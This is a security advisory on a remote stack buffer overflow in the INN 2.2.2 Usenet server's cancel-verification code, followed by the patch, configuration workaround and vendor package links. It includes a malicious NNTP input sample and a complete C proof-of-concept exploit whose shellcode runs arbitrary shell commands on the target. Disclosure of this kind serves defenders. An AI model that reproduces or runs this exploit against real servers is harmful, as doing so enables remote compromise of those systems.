COMMAND
innd
SYSTEMS AFFECTED
INND 2.2.2
PROBLEM
Michal Zalewski found following. Newest innd 2.2.2, probably the
most popular usenet news server (as well as previous versions)
contain remotely exploitable, trivial on-stack buffer overflow in
control articles handler.
Offending piece of code (in innd/art.c, function ARTcancelverify):
if (!EQ(local, p)) {
files = NULL;
(void)sprintf(buff, "\"%.50s\" wants to cancel %s by \"%.50s\"",
p, MessageID, local);
ARTlog(Data, ART_REJECT, buff);
}
Where buff (local stack buffer) is SMBUF bytes long (it means,
256 bytes), but MessageID can be up to 1000 almost bytes long.
This code is reached when cancel request is sent to special
newsgroup (called 'control'), and cancel request contains valid
Message-ID, but From/Sender fields are different in cancel
request and in original posting.
How to exploit it? It could be a problem for script kiddies, as
Message-ID is strictly checked for non-printable characters etc.
But hey, Message-ID can be used only as a padding, and then we
can overwrite return address with From/Sender address of cancel
post! This field is not verified in any fascist way. Shellcode?
Can be placed anywhere, quite big portions of cancel post are
lying in the accessible memory when overflow happens.
Sample input ("LONGBUFFER" = around 500-600 bytes of AAAs..., has
to be the same every time):
-- input -
201 XXX InterNetNews NNRP server INN 2.2 23-Oct-1998 ready (posting ok)
mode reader
group pl.test
post
Message-ID: <none@LONGBUFFER>
From: <test@polbox.com>
Sender: <test@polbox.com>
Newsgroups: pl.test
testing
. <- single dot, comment to avoid mail transfer problems
group control
post
Message-ID: <some-random-msgid@test.pl>
Approved: <approver@approving.net>From: <sucker@free.net.pl>
Sender: <sucker@free.net.pl>
Control: cancel <none@LONGBUFFER>
Subject: cmsg cancel <none@LONGBUFFER>
Newsgroups: control
Damn, cancel it.
. <- single dot
quit
-- EOF --
If innd/nnrp is running under debugger like strace, you'll see
that child process responsible for request handling dies with
SIGSEGV. Nice.
Wojciech Purczynski wrote proof-of-concept exploit. It is rather
trivial to exploit as we have plenty of room to put our shellcode.
/*
* inndx: innd remote 'news' user/group exploit
*
* Written on 12th June 2000 by Wojciech Purczynski
* <wp@elzabsoft.pl> cliph/ircnet
*
* Bug found by Michal Zalewski.
*
* Tested on innd-2.2.2-3 default installation on RedHat 6.2.
*
* Usage:
* ./inndx [command [offset]]|nc -i 1 target.host 119
*/
#include <stdio.h>
#include <unistd.h>
#define RETADDR 0x8138004 /* we're jumping into the body of cancel msg */
#define BUFSIZE (256+2*4+4) /* buff + EBP + EIP + Data */
#define JUNKSIZE strlen("\"\" wants to cancel <> by \"")
#define NOP 0x90
#define FAKEPTR 0xbffff1c0
#define COMMAND "echo U have b33n h@x0r3d hahahah|mail root"
#define BODYSIZE 999
/* Code written by me */
char * run_command=
"\xeb\x3d\x5e\x89\xf7\x31\xc0\x47"
"\x80\x3f\xff\x75\xfa\x88\x07\x47"
"\x89\x37\x89\xf3\x46\x80\x3e\x2e"
"\x75\xfa\x88\x06\x46\x89\x77\x04"
"\x46\x80\x3e\x2e\x75\xfa\x88\x06"
"\x46\x89\x77\x08\x89\x47\x0c\x89"
"\xf9\x8d\x57\x0c\xb0\x0b\xcd\x80"
"\x89\xc3\x31\xc0\x40\xcd\x80\xe8"
"\xbe\xff\xff\xff/bin/sh.-c.";
int main(int argc, char *argv[])
{
int retaddr=RETADDR;
char messageid[256];
char sender[16];
char body[BODYSIZE];
char * command=COMMAND;
int midsize;
int i;
if (argc>1) command=argv[1];
if (argc>2) retaddr+=atoi(argv[2]);
memset(sender, 0, sizeof(sender));
strcpy(sender+0, "a@a."); /* EBP */
*(long*)(sender+4)=(long)retaddr; /* EIP */
*(long*)(sender+8)=(long)RETADDR+1000; /* Data */
memset(messageid, 'a', sizeof(messageid));
sprintf(messageid, "%s@a", tmpnam(NULL)+9);
messageid[strlen(messageid)]='a';
messageid[BUFSIZE-JUNKSIZE-5-strlen(sender)]=0;
memset(body, NOP, sizeof(body));
strcpy(body+sizeof(body)-strlen(run_command)-strlen(command)-2, run_command);
strcat(body, command);
strcat(body, "\xff");
fprintf(stderr, "RETADDR=%p\n", retaddr);
fprintf(stderr, "COMMAND=%s\n", command);
printf("mode reader\r\ngroup test\r\npost\r\n");
printf("Message-ID: <%s>\r\n", messageid);
printf("From: %s\r\nSender: %s\r\n", sender, sender);
printf("Newsgroups: test\r\n");
printf("Subject: blah\r\n");
printf("\r\nblah\r\n.\r\n");
printf("group control\r\npost\r\n");
printf("Message-ID: <%s@test>\r\n", tmpnam(NULL)+9);
printf("From: a@b.c\r\nSender: a@b.c\r\n");
printf("Control: cancel <%s>\r\n", messageid);
printf("Subject: cmsg cancel <%s>\r\n", messageid);
printf("Newsgroups: control\r\n\r\n%s\r\n.\r\nquit\r\n", body);
}
SOLUTION
Note that this code is only ever executed if the option
"verifycancels" is enabled in inn.conf. This is *not* the
default, and has been recommended against for some time now since
it really doesn't do any real good. It is enabled by default in
RH, and usually is enabled on live innd sites.
INN 1.7.x and earlier is not affected by this. The vulnerable
code appeared in the 2.x branch. Obvious fix:
--- inn/innd/art.c 2000/06/05 22:39:52 1.142
+++ inn/innd/art.c 2000/06/06 19:31:56 1.143
@@ -1042,7 +1042,7 @@
HeaderCleanFrom(p);
if (!EQ(q, p)) {
token = NULL;
- (void)sprintf(buff, "\"%.50s\" wants to cancel %s by \"%.50s\"",
+ (void)sprintf(buff, "\"%.50s\" wants to cancel %.70s by \"%.50s\"",
p, MessageID, q);
ARTlog(Data, ART_REJECT, buff);
}
Those folks who want to run with verifycancels turned on should
get the latest STABLE snapshot from /isc/inn/snapshots on
ftp.isc.org. 2.2.3 fixes this. Workaround in the meantime is to
turn off verifycancels in inn.conf. This whole block of code will
likely be removed for INN 2.4.
Note that due to the syntax checking INN performs on message IDs,
this will be mildly difficult to exploit, although it's probably
at least theoretically possible.
For Caldera Systems it is known that vulnerable are OpenLinux
Desktop 2.3 (previous to inn-2.2.3), OpenLinux eServer 2.3 and
OpenLinux eBuilder (previous to inn-2.2.3) and OpenLinux eDesktop
2.4 (previous to inn-2.2.3). If you do not use INN, simply remove
the package:
rpm -e inn
In /etc/news/inn.conf replace the line:
verifycancels: true
by
verifycancels: false
and reload the INN configuration:
/usr/libexec/inn/bin/ctlinnd reload all 'security fix'
As for Conectiva Linux (4.0, 4.1, 4.2 and 5.0) use same or:
i386/inews-2.2.2-3cl.i386.rpm
i386/inn-devel-2.2.2-3cl.i386.rpm
i386/inn-2.2.2-3cl.i386.rpm
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.0
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.1
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.2
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/5.0
Direct links to the packages:
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.0/i386/inews-2.2.2-3cl.i386.rpm
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.0/i386/inn-2.2.2-3cl.i386.rpm
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.0/i386/inn-devel-2.2.2-3cl.i386.rpm
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.1/i386/inews-2.2.2-3cl.i386.rpm
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.1/i386/inn-2.2.2-3cl.i386.rpm
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.1/i386/inn-devel-2.2.2-3cl.i386.rpm
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.2/i386/inews-2.2.2-3cl.i386.rpm
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.2/i386/inn-2.2.2-3cl.i386.rpm
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.2/i386/inn-devel-2.2.2-3cl.i386.rpm
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/5.0/i386/inews-2.2.2-3cl.i386.rpm
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/5.0/i386/inn-2.2.2-3cl.i386.rpm
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/5.0/i386/inn-devel-2.2.2-3cl.i386.rpm
For Mandrake Linux:
6.0/RPMS/inews-2.2.3-1mdk.i586.rpm
6.0/RPMS/inn-2.2.3-1mdk.i586.rpm
6.0/RPMS/inn-devel-2.2.3-1mdk.i586.rpm
6.0/SRPMS/inn-2.2.3-1mdk.src.rpm
6.1/RPMS/inews-2.2.3-1mdk.i586.rpm
6.1/RPMS/inn-2.2.3-1mdk.i586.rpm
6.1/RPMS/inn-devel-2.2.3-1mdk.i586.rpm
6.1/SRPMS/inn-2.2.3-1mdk.src.rpm
7.0/RPMS/inews-2.2.3-1mdk.i586.rpm
7.0/RPMS/inn-2.2.3-1mdk.i586.rpm
7.0/RPMS/inn-devel-2.2.3-1mdk.i586.rpm
7.0/SRPMS/inn-2.2.3-1mdk.src.rpm
7.1/RPMS/inews-2.2.3-1mdk.i586.rpm
7.1/RPMS/inn-2.2.3-1mdk.i586.rpm
7.1/RPMS/inn-devel-2.2.3-1mdk.i586.rpm
7.1/SRPMS/inn-2.2.3-1mdk.src.rpm
The Internet Software Consortium shutted down tgis holewith
bug-fix release of INN is available at:
ftp://ftp.isc.org/isc/inn/inn-2.2.3.tar.gz
This will be the final release of the INN 2.2.x series, barring
major security holes. INN 2.3.0 will be released shortly, and
features a significantly different internal architecture.
Development has already begun on the INN 2.4.x series.
For Debian:
http://security.debian.org/dists/stable/updates/main/source/inn2_2.2.2.2000.01.31-4.1.diff.gz
http://security.debian.org/dists/stable/updates/main/source/inn2_2.2.2.2000.01.31-4.1.dsc
http://security.debian.org/dists/stable/updates/main/source/inn2_2.2.2.2000.01.31.orig.tar.gz
http://security.debian.org/dists/stable/updates/main/binary-i386/inn2-dev_2.2.2.2000.01.31-4.1_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/inn2-inews_2.2.2.2000.01.31-4.1_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/inn2_2.2.2.2000.01.31-4.1_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/inn2-dev_2.2.2.2000.01.31-4.1_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/inn2-inews_2.2.2.2000.01.31-4.1_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/inn2_2.2.2.2000.01.31-4.1_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/inn2-dev_2.2.2.2000.01.31-4.1_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/inn2-inews_2.2.2.2000.01.31-4.1_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/inn2_2.2.2.2000.01.31-4.1_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/inn2-dev_2.2.2.2000.01.31-4.1_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/inn2-inews_2.2.2.2000.01.31-4.1_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/inn2_2.2.2.2000.01.31-4.1_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/inn2-dev_2.2.2.2000.01.31-4.1_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/inn2-inews_2.2.2.2000.01.31-4.1_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/inn2_2.2.2.2000.01.31-4.1_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/inn2-dev_2.2.2.2000.01.31-4.1_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/inn2-inews_2.2.2.2000.01.31-4.1_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/inn2_2.2.2.2000.01.31-4.1_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-all/task-news-server_2.2.2.2000.01.31-4.1_all.deb